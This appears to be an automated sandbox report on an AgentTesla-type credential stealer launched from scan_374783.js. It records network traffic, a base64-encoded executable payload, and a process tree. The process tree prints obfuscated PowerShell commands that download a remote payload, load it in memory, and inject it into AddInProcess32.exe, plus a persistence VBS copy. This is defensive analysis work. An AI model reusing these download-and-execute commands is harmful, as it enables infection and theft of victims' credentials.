                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s0YpyWF3bQLJbr3sonZTVHeJSsZtB0gbZsQC2wJRpJ1a7d51DQaNCQmqoqYyjZESU3TqM8xuYxScR95akWxm1l2SCCJqbEI9aEsDZpWbzQ8QKGh5eni8SFjaaw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8ceecf6fab9d17a9-EWR
                                                                        2024-10-07 15:09:07 UTC  171                IN         Data Ascii: 1f7fvar760 = "texto759"var761 = "texto760"var762 = "texto761"var763 = "texto762"var764 = "texto763"var765 = "texto764"var766 = "texto765"var767 = "text
                                                                        2024-10-07 15:09:07 UTC  1369               IN         Data Ascii: o766"var768 = "texto767"var769 = "texto768"var770 = "texto769"var771 = "texto770"var772 = "texto771"var773 = "texto772"var774 = "texto773"var775 = "texto774"var776 = "texto775"var777 = "texto776"var778 = "texto777"var779 = "texto
                                                                        2024-10-07 15:09:07 UTC  1369               IN         Data Ascii: = "texto831"var833 = "texto832"var834 = "texto833"var835 = "texto834"var836 = "texto835"var837 = "texto836"var838 = "texto837"var839 = "texto838"var840 = "texto839"var841 = "texto840"var842 = "texto841"var843 = "texto842"var844
                                                                        2024-10-07 15:09:07 UTC  1369               IN         Data Ascii: var897 = "texto896"var898 = "texto897"var899 = "texto898"var900 = "texto899"var901 = "texto900"var902 = "texto901"var903 = "texto902"var904 = "texto903"var905 = "texto904"var906 = "texto905"var907 = "texto906"var908 = "texto907"
                                                                        2024-10-07 15:09:07 UTC  1369               IN         Data Ascii: "texto960"var962 = "texto961"var963 = "texto962"var964 = "texto963"var965 = "texto964"var966 = "texto965"var967 = "texto966"var968 = "texto967"var969 = "texto968"var970 = "texto969"var971 = "texto970"var972 = "texto971"var973 = "
                                                                        2024-10-07 15:09:07 UTC  1369               IN         Data Ascii: 2"var1024 = "texto1023"var1025 = "texto1024"var1026 = "texto1025"var1027 = "texto1026"var1028 = "texto1027"var1029 = "texto1028"var1030 = "texto1029"var1031 = "texto1030"var1032 = "texto1031"var1033 = "texto1032"var1034 = "texto103
                                                                        2024-10-07 15:09:07 UTC  1055               IN         Data Ascii: 1"var1083 = "texto1082"var1084 = "texto1083"var1085 = "texto1084"var1086 = "texto1085"var1087 = "texto1086"var1088 = "texto1087"var1089 = "texto1088"var1090 = "texto1089"var1091 = "texto1090"var1092 = "texto1091"var1093 = "texto109
                                                                        2024-10-07 15:09:07 UTC  1369               IN         Data Ascii: 70008 = "texto1127"var1129 = "texto1128"var1130 = "texto1129"var1131 = "texto1130"var1132 = "texto1131"var1133 = "texto1132"var1134 = "texto1133"var1135 = "texto1134"var1136 = "texto1135"var1137 = "texto1136"var1138 = "texto1137"
                                                                        2024-10-07 15:09:07 UTC  1369               IN         Data Ascii: var1187 = "texto1186"var1188 = "texto1187"var1189 = "texto1188"var1190 = "texto1189"var1191 = "texto1190"var1192 = "texto1191"var1193 = "texto1192"var1194 = "texto1193"var1195 = "texto1194"var1196 = "texto1195"var1197 = "texto1196"
                                                                        2024-10-07 15:09:07 UTC  1369               IN         Data Ascii: var1246 = "texto1245"var1247 = "texto1246"var1248 = "texto1247"var1249 = "texto1248"var1250 = "texto1249"var1251 = "texto1250"var1252 = "texto1251"var1253 = "texto1252"var1254 = "texto1253"var1255 = "texto1254"var1256 = "texto1255"


                                                                        Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                        1           192.168.2.7  49709        185.199.110.133  443               7176  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Timestamp                Bytes transferred  Direction  Data
                                                                        2024-10-07 15:09:15 UTC  128                OUT        GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1
                                                                        Host: raw.githubusercontent.com
                                                                        Connection: Keep-Alive
2024-10-07 15:09:15 UTC | 904 | IN | HTTP/1.1 200 OK
                                                                        Connection: close
                                                                        Content-Length: 2935468
                                                                        Cache-Control: max-age=300
                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                        Content-Type: text/plain; charset=utf-8
                                                                        ETag: "df9ff7aedbae4b4f50e2ae3a8f13fd0b84c66fbd35e7ac0df91a7a47b720c032"
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        X-Content-Type-Options: nosniff
                                                                        X-Frame-Options: deny
                                                                        X-XSS-Protection: 1; mode=block
                                                                        X-GitHub-Request-Id: 33D1:A1DE:104DADA:11B62C5:6703F99A
                                                                        Accept-Ranges: bytes
                                                                        Date: Mon, 07 Oct 2024 15:09:15 GMT
                                                                        Via: 1.1 varnish
                                                                        X-Served-By: cache-ewr-kewr1740027-EWR
                                                                        X-Cache: MISS
                                                                        X-Cache-Hits: 0
                                                                        X-Timer: S1728313756.815684,VS0,VE136
                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                        Access-Control-Allow-Origin: *
                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                        X-Fastly-Request-ID: 742723ba9bdd6294885a453159d5bb16485cc5df
                                                                        Expires: Mon, 07 Oct 2024 15:14:15 GMT
                                                                        Source-Age: 0
                                                                        2024-10-07 15:09:15 UTC1378INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 41 4f 50 39 57 59 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 4a 41 68 41 41 41 47 41 41 41 41 41 41 41 41 33 71 38 68 41 41 41 67 41 41 41 41 77 43 45 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                                                        Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAOP9WYAAAAAAAAAAOAADiELATAAAJAhAAAGAAAAAAAA3q8hAAAgAAAAwCEAAABAAAAgAAAAAgA
                                                                        2024-10-07 15:09:15 UTC1378INData Raw: 41 41 42 67 41 41 41 44 67 41 41 41 41 41 4b 67 49 44 66 51 55 41 41 41 51 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 41 51 41 41 51 35 30 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 6a 48 2f 2f 2f 2f 41 45 59 6f 45 67 41 41 42 67 49 6f 43 51 41 41 42 69 67 42 41 41 41 4b 4b 67 41 41 45 7a 41 44 41 47 30 41 41 41 41 42 41 41 41 52 49 41 45 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 49 41 41 41 41 46 41 41 41 41 47 51 41 41 41 44 67 41 41 41 41 41 41 69 67 55 41 41 41 47 41 32 38 46 41 41 41 47 4b 42 55 41 41 41 59 71 46 69 6f 43 4b 42 4d 41 41 41 59 44 4b 42 4d 41 41 41 59 6f 41 67 41 41 43 6a 6e 6f 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 75 45 41 41 45 4f 72 44 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 70 66 2f 2f 2f
                                                                        Data Ascii: AABgAAADgAAAAAKgIDfQUAAAQgAAAAAH6EEAAEe0AQAAQ50v///yYgAAAAADjH////AEYoEgAABgIoCQAABigBAAAKKgAAEzADAG0AAAABAAARIAEAAAD+DgAAOAAAAAD+DAAARQIAAAAFAAAAGQAAADgAAAAAAigUAAAGA28FAAAGKBUAAAYqFioCKBMAAAYDKBMAAAYoAgAACjno////IAAAAAB+hBAABHsuEAAEOrD///8mIAAAAAA4pf///
                                                                        2024-10-07 15:09:15 UTC1378INData Raw: 49 41 45 41 41 41 41 34 6d 66 2f 2f 2f 77 49 4f 42 48 30 4a 41 41 41 45 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 61 45 41 41 45 4f 58 33 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 63 76 2f 2f 2f 7a 49 43 4b 42 6b 41 41 41 59 6f 4a 77 41 41 42 69 6f 41 41 41 41 54 4d 41 4d 41 6b 51 41 41 41 41 4d 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 42 41 41 41 41 41 59 41 41 41 41 46 41 41 41 41 4c 41 41 41 41 46 49 41 41 41 41 34 41 51 41 41 41 43 6f 52 41 53 67 6b 41 41 41 47 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 2f 45 41 41 45 4f 73 72 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 76 2f 2f 2f 2f 78 45 42 4f 64 4c 2f 2f 2f 38 67 41 41 41 41 41 48 36 45 45 41 41 45 65 33 77 51 41 41 51 36 70 50 2f 2f 2f 79 59 67 41 41 41
                                                                        Data Ascii: IAEAAAA4mf///wIOBH0JAAAEIAAAAAB+hBAABHtaEAAEOX3///8mIAAAAAA4cv///zICKBkAAAYoJwAABioAAAATMAMAkQAAAAMAABEgAwAAAP4OAAA4AAAAAP4MAABFBAAAAAYAAAAFAAAALAAAAFIAAAA4AQAAACoRASgkAAAGIAAAAAB+hBAABHs/EAAEOsr///8mIAEAAAA4v////xEBOdL///8gAAAAAH6EEAAEe3wQAAQ6pP///yYgAAA
                                                                        2024-10-07 15:09:15 UTC1378INData Raw: 45 67 41 41 41 41 41 48 36 45 45 41 41 45 65 79 49 51 41 41 51 36 53 66 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 2b 2f 2f 2f 2f 45 51 51 6f 4f 51 41 41 42 6a 72 4d 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 6d 45 41 41 45 4f 68 37 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 45 2f 2f 2f 2f 39 33 45 2f 76 2f 2f 45 51 51 36 58 51 41 41 41 43 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 69 68 41 41 42 44 6b 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 55 41 52 51 4d 41 41 41 41 46 41 41 41 41 4b 51 41 41 41 44 6f 41 41 41 41 34 41 41 41 41 41 44 67 77 41 41 41 41 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 73 6f 45 41 41 45 4f 74 48 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 78 76 2f 2f 2f 78 45 45 4b 44 6f 41 41 41 59 67 41 67 41 41 41
                                                                        Data Ascii: EgAAAAAH6EEAAEeyIQAAQ6Sf///yYgBAAAADg+////EQQoOQAABjrM////IAAAAAB+hBAABHtmEAAEOh7///8mIAAAAAA4E////93E/v//EQQ6XQAAACAAAAAAfoQQAAR7ihAABDkPAAAAJiAAAAAAOAQAAAD+DAUARQMAAAAFAAAAKQAAADoAAAA4AAAAADgwAAAAIAEAAAB+hBAABHsoEAAEOtH///8mIAEAAAA4xv///xEEKDoAAAYgAgAAA
                                                                        2024-10-07 15:09:15 UTC1378INData Raw: 4f 4a 50 2f 2f 2f 38 43 46 48 30 51 41 41 41 45 49 41 55 41 41 41 41 34 67 76 2f 2f 2f 77 4a 37 45 41 41 41 42 43 67 45 41 41 41 72 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 74 63 45 41 41 45 4f 6d 50 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 57 50 2f 2f 2f 79 6f 71 41 6e 73 50 41 41 41 45 4b 41 55 41 41 43 73 67 41 41 41 41 41 48 36 45 45 41 41 45 65 78 6b 51 41 41 51 35 4e 2f 2f 2f 2f 79 59 67 41 41 41 41 41 44 67 73 2f 2f 2f 2f 41 41 41 6d 66 68 45 41 41 41 51 55 2f 67 45 71 41 41 41 61 66 68 45 41 41 41 51 71 41 43 72 2b 43 51 41 41 62 77 30 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 77 63 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 31 30 41 41 41 59 71 41 44 34 41 2f 67 6b 41 41 50 34 4a 41 51 41 6f 62 77 41 41 42 69 6f 36 2f 67 6b 41 41 50 34 4a 41 51 42
                                                                        Data Ascii: OJP///8CFH0QAAAEIAUAAAA4gv///wJ7EAAABCgEAAArIAEAAAB+hBAABHtcEAAEOmP///8mIAEAAAA4WP///yoqAnsPAAAEKAUAACsgAAAAAH6EEAAEexkQAAQ5N////yYgAAAAADgs////AAAmfhEAAAQU/gEqAAAafhEAAAQqACr+CQAAbw0AAAoqACr+CQAAbwcAAAoqACr+CQAAb10AAAYqAD4A/gkAAP4JAQAobwAABio6/gkAAP4JAQB
                                                                        2024-10-07 15:09:15 UTC1378INData Raw: 67 41 41 41 5a 7a 45 41 41 41 43 6e 4d 52 41 41 41 4b 66 52 41 41 41 41 51 67 41 67 41 41 41 48 36 45 45 41 41 45 65 32 34 51 41 41 51 35 41 50 37 2f 2f 79 59 67 48 51 41 41 41 44 6a 31 2f 66 2f 2f 41 78 38 51 4b 4e 45 43 41 41 59 35 4a 41 49 41 41 43 41 4f 41 41 41 41 66 6f 51 51 41 41 52 37 4a 68 41 41 42 44 6e 55 2f 66 2f 2f 4a 69 41 44 41 41 41 41 4f 4d 6e 39 2f 2f 38 43 65 78 59 41 41 41 51 52 42 68 45 48 49 50 2f 2f 2f 33 39 66 63 31 67 41 41 41 5a 76 45 67 41 41 43 69 41 52 41 41 41 41 66 6f 51 51 41 41 52 37 55 78 41 41 42 44 71 62 2f 66 2f 2f 4a 69 41 61 41 41 41 41 4f 4a 44 39 2f 2f 38 43 63 78 4d 41 41 41 70 39 46 67 41 41 42 43 41 48 41 41 41 41 4f 48 76 39 2f 2f 38 52 42 79 41 41 41 41 43 41 58 7a 6c 4a 41 51 41 41 49 41 55 41 41 41 41 34 5a
                                                                        Data Ascii: gAAAZzEAAACnMRAAAKfRAAAAQgAgAAAH6EEAAEe24QAAQ5AP7//yYgHQAAADj1/f//Ax8QKNECAAY5JAIAACAOAAAAfoQQAAR7JhAABDnU/f//JiADAAAAOMn9//8CexYAAAQRBhEHIP///39fc1gAAAZvEgAACiARAAAAfoQQAAR7UxAABDqb/f//JiAaAAAAOJD9//8CcxMAAAp9FgAABCAHAAAAOHv9//8RByAAAACAXzlJAQAAIAUAAAA4Z
                                                                        2024-10-07 15:09:15 UTC1378INData Raw: 41 41 42 2b 68 42 41 41 42 48 73 78 45 41 41 45 4f 6b 6a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 50 66 2f 2f 2f 7a 6a 53 2f 2f 2f 2f 49 41 55 41 41 41 41 34 4c 76 2f 2f 2f 77 41 6f 55 67 41 41 42 68 45 42 4b 46 4d 41 41 41 59 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 5a 78 41 41 42 44 6f 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 49 41 52 51 45 41 41 41 41 46 41 41 41 41 4f 41 41 41 41 41 44 64 5a 77 41 41 41 43 59 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 73 51 41 41 51 36 44 77 41 41 41 43 59 67 41 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 41 41 45 55 43 41 41 41 41 42 51 41 41 41 43 63 41 41 41 41 34 41 41 41 41 41 42 51 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 67 68 41 41 42 44 72 58 2f 2f 2f 2f 4a 69 41
                                                                        Data Ascii: AAB+hBAABHsxEAAEOkj///8mIAAAAAA4Pf///zjS////IAUAAAA4Lv///wAoUgAABhEBKFMAAAYTBSAAAAAAfoQQAAR7ZxAABDoPAAAAJiAAAAAAOAQAAAD+DAIARQEAAAAFAAAAOAAAAADdZwAAACYgAAAAAH6EEAAEe0sQAAQ6DwAAACYgAAAAADgEAAAA/gwAAEUCAAAABQAAACcAAAA4AAAAABQTBSAAAAAAfoQQAAR7ghAABDrX////JiA
                                                                        2024-10-07 15:09:16 UTC1378INData Raw: 59 67 43 41 41 41 41 44 67 4a 2f 76 2f 2f 45 51 45 6f 53 77 41 41 42 68 4d 48 49 41 73 41 41 41 41 34 39 76 33 2f 2f 78 45 4a 4b 68 45 41 65 78 67 41 41 41 51 6f 56 77 41 41 42 6e 4d 67 41 41 41 47 45 77 6b 67 42 67 41 41 41 44 6a 57 2f 66 2f 2f 4f 4e 37 2f 2f 2f 38 67 44 41 41 41 41 48 36 45 45 41 41 45 65 7a 38 51 41 41 51 36 76 66 33 2f 2f 79 59 67 44 67 41 41 41 44 69 79 2f 66 2f 2f 41 6e 73 54 41 41 41 45 45 51 51 52 42 53 68 57 41 41 41 47 45 77 67 67 42 77 41 41 41 44 69 58 2f 66 2f 2f 41 42 4d 77 41 77 42 39 41 41 41 41 41 51 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 57 51 41 41 41 41 55 41 41 41 41 76 41 41 41 41 4f 46 51 41 41 41 41 43 63 77 34 41 41 41 70 39 45 41 41 41 42 43 41 41 41
                                                                        Data Ascii: YgCAAAADgJ/v//EQEoSwAABhMHIAsAAAA49v3//xEJKhEAexgAAAQoVwAABnMgAAAGEwkgBgAAADjW/f//ON7///8gDAAAAH6EEAAEez8QAAQ6vf3//yYgDgAAADiy/f//AnsTAAAEEQQRBShWAAAGEwggBwAAADiX/f//ABMwAwB9AAAAAQAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAAWQAAAAUAAAAvAAAAOFQAAAACcw4AAAp9EAAABCAAA
                                                                        2024-10-07 15:09:16 UTC1378INData Raw: 42 68 62 2b 42 43 6f 41 41 41 41 2b 44 77 41 44 4b 48 45 41 41 41 59 57 2f 67 49 57 2f 67 45 71 4d 67 38 41 41 79 68 78 41 41 41 47 46 76 34 43 4b 67 41 41 41 44 34 50 41 41 4d 6f 63 51 41 41 42 68 62 2b 42 42 62 2b 41 53 6f 6d 44 77 41 44 4b 48 49 41 41 41 59 71 41 41 41 79 44 77 41 44 4b 48 49 41 41 41 59 57 2f 67 45 71 41 41 41 41 45 7a 41 44 41 41 6f 42 41 41 41 4b 41 41 41 52 49 41 51 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 55 41 41 41 43 4b 41 41 41 41 73 51 41 41 41 41 55 41 41 41 42 67 41 41 41 41 4c 77 41 41 41 44 69 46 41 41 41 41 45 67 45 44 65 78 30 41 41 41 51 6f 48 51 41 41 43 69 6f 43 65 78 34 41 41 41 52 76 48 67 41 41 43 67 4e 37 48 67 41 41 42 43 68 34 41 41 41 47 62 78 38 41 41 41 6f 71 41 69 68 6a 41 41 41
                                                                        Data Ascii: Bhb+BCoAAAA+DwADKHEAAAYW/gIW/gEqMg8AAyhxAAAGFv4CKgAAAD4PAAMocQAABhb+BBb+ASomDwADKHIAAAYqAAAyDwADKHIAAAYW/gEqAAAAEzADAAoBAAAKAAARIAQAAAD+DgAAOAAAAAD+DAAARQUAAACKAAAAsQAAAAUAAABgAAAALwAAADiFAAAAEgEDex0AAAQoHQAACioCex4AAARvHgAACgN7HgAABCh4AAAGbx8AAAoqAihjAAA
                                                                        2024-10-07 15:09:16 UTC1378INData Raw: 2f 2f 2f 78 4d 77 41 77 43 42 41 41 41 41 43 77 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 4c 51 41 41 41 44 67 41 41 41 41 46 41 41 41 41 4f 43 67 41 41 41 41 43 41 79 68 37 41 41 41 47 45 77 45 67 41 51 41 41 41 48 36 45 45 41 41 45 65 35 59 51 41 41 51 36 7a 66 2f 2f 2f 79 59 67 41 51 41 41 41 44 6a 43 2f 2f 2f 2f 46 43 6f 52 41 51 51 6f 67 51 41 41 42 69 6f 52 41 54 72 77 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 31 45 41 41 45 4f 5a 7a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 6b 66 2f 2f 2f 77 41 41 41 42 4d 77 42 41 43 43 41 41 41 41 43 77 41 41 45 53 41 42 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 42 51 41 41 41 43 73 41 41 41 42 55 41
                                                                        Data Ascii: ///xMwAwCBAAAACwAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAALQAAADgAAAAFAAAAOCgAAAACAyh7AAAGEwEgAQAAAH6EEAAEe5YQAAQ6zf///yYgAQAAADjC////FCoRAQQogQAABioRATrw////IAAAAAB+hBAABHs1EAAEOZz///8mIAAAAAA4kf///wAAABMwBACCAAAACwAAESABAAAA/g4AADgAAAAA/gwAAEUDAAAABQAAACsAAABUA



                                                                        Target ID:0
                                                                        Start time:11:09:03
                                                                        Start date:07/10/2024
                                                                        Path:C:\Windows\System32\wscript.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_374783.js"
                                                                        Imagebase:0x7ff629140000
                                                                        File size:170'496 bytes
                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:8
                                                                        Start time:11:09:06
                                                                        Start date:07/10/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                        Imagebase:0x7ff741d30000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:9
                                                                        Start time:11:09:06
                                                                        Start date:07/10/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff75da10000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        Target ID:11
                                                                        Start time:11:09:12
                                                                        Start date:07/10/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('B'+'08url = C'+'7Ihttps://ra'+'w.'+'gi'+'thu'+'bu'+'sercont'+'ent'+'.c'+'om/N'+'oDetectO'+'n/NoDe'+'tectOn/refs'+'/h'+'ea'+'d'+'s'+'/'+'m'+'ain/De'+'tahNo'+'th-V'+'.t'+'xtC'+'7I; B0'+'8bas'+'e64C'+'o'+'ntent = (New-Obj'+'ec'+'t System.Net.We'+'bClient).D'+'ownlo'+'ad'+'Str'+'i'+'ng(B'+'08u'+'rl'+'); B0'+'8'+'bina'+'r'+'y'+'C'+'ont'+'ent ='+' [Syst'+'em.Conve'+'rt]::'+'Fr'+'omBase64Strin'+'g('+'B0'+'8ba'+'se64'+'Cont'+'ent); '+'B08assembly '+'= [Refl'+'ec'+'t'+'ion.Assembly]::L'+'oad(B08'+'binaryC'+'o'+'nten'+'t)'+'; [dnlib'+'.I'+'O.H'+'om'+'e'+']::VA'+'I('+'pQ'+'U884e'+'8e0d52'+'f0-'+'e5a'+'b-'+'1'+'164-00c6'+'-aaa2ff5e'+'='+'n'+'e'+'k'+'ot&aidem=tla?tx'+'t'+'.42020170nig'+'irore'+'ivax/o/mo'+'c.'+'topsppa.4202s'+'tpyr'+'c'+'/b/0v'+'/moc'+'.'+'sipaelg'+'oog'+'.e'+'garo'+'t'+'sesab'+'erif'+'//:'+'s'+'pt'+'thpQU,'+' pQU1pQU,'+' pQUC:T'+'4yProgramData'+'T4'+'y'+'pQU, p'+'QUa'+'lcati'+'fap'+'QU, pQUAddInPr'+'ocess3'+'2'+'pQU, pQ'+'UpQU,p'+'QU'+'p'+'QU)') -CrepLaCe ([ChaR]112+[ChaR]81+[ChaR]85),[ChaR]34 -CrepLaCe ([ChaR]67+[ChaR]55+[ChaR]73),[ChaR]39 -RePlAce ([ChaR]66+[ChaR]48+[ChaR]56),[ChaR]36 -RePlAce ([ChaR]84+[ChaR]52+[ChaR]121),[ChaR]92)|.( ([sTRinG]$VeRBoSepreFerENce)[1,3]+'X'-JOin'')"
                                                                        Imagebase:0x7ff741d30000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:12
                                                                        Start time:11:09:17
                                                                        Start date:07/10/2024
                                                                        Path:C:\Windows\System32\cmd.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\alcatifa.vbs"
                                                                        Imagebase:0x7ff6ab480000
                                                                        File size:289'792 bytes
                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:13
                                                                        Start time:11:09:17
                                                                        Start date:07/10/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff75da10000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:14
                                                                        Start time:11:09:19
                                                                        Start date:07/10/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                        Imagebase:0x7b0000
                                                                        File size:43'008 bytes
                                                                        MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.2549002759.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.2549002759.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.2553669358.0000000002B05000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:moderate
                                                                        Has exited:false

                                                                        Target ID:16
                                                                        Start time:12:11:27
                                                                        Start date:07/10/2024
                                                                        Path:C:\Windows\System32\wscript.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\ProgramData\alcatifa.vbs"
                                                                        Imagebase:0x7ff629140000
                                                                        File size:170'496 bytes
                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:17
                                                                        Start time:12:11:36
                                                                        Start date:07/10/2024
                                                                        Path:C:\Windows\System32\wscript.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\ProgramData\alcatifa.vbs"
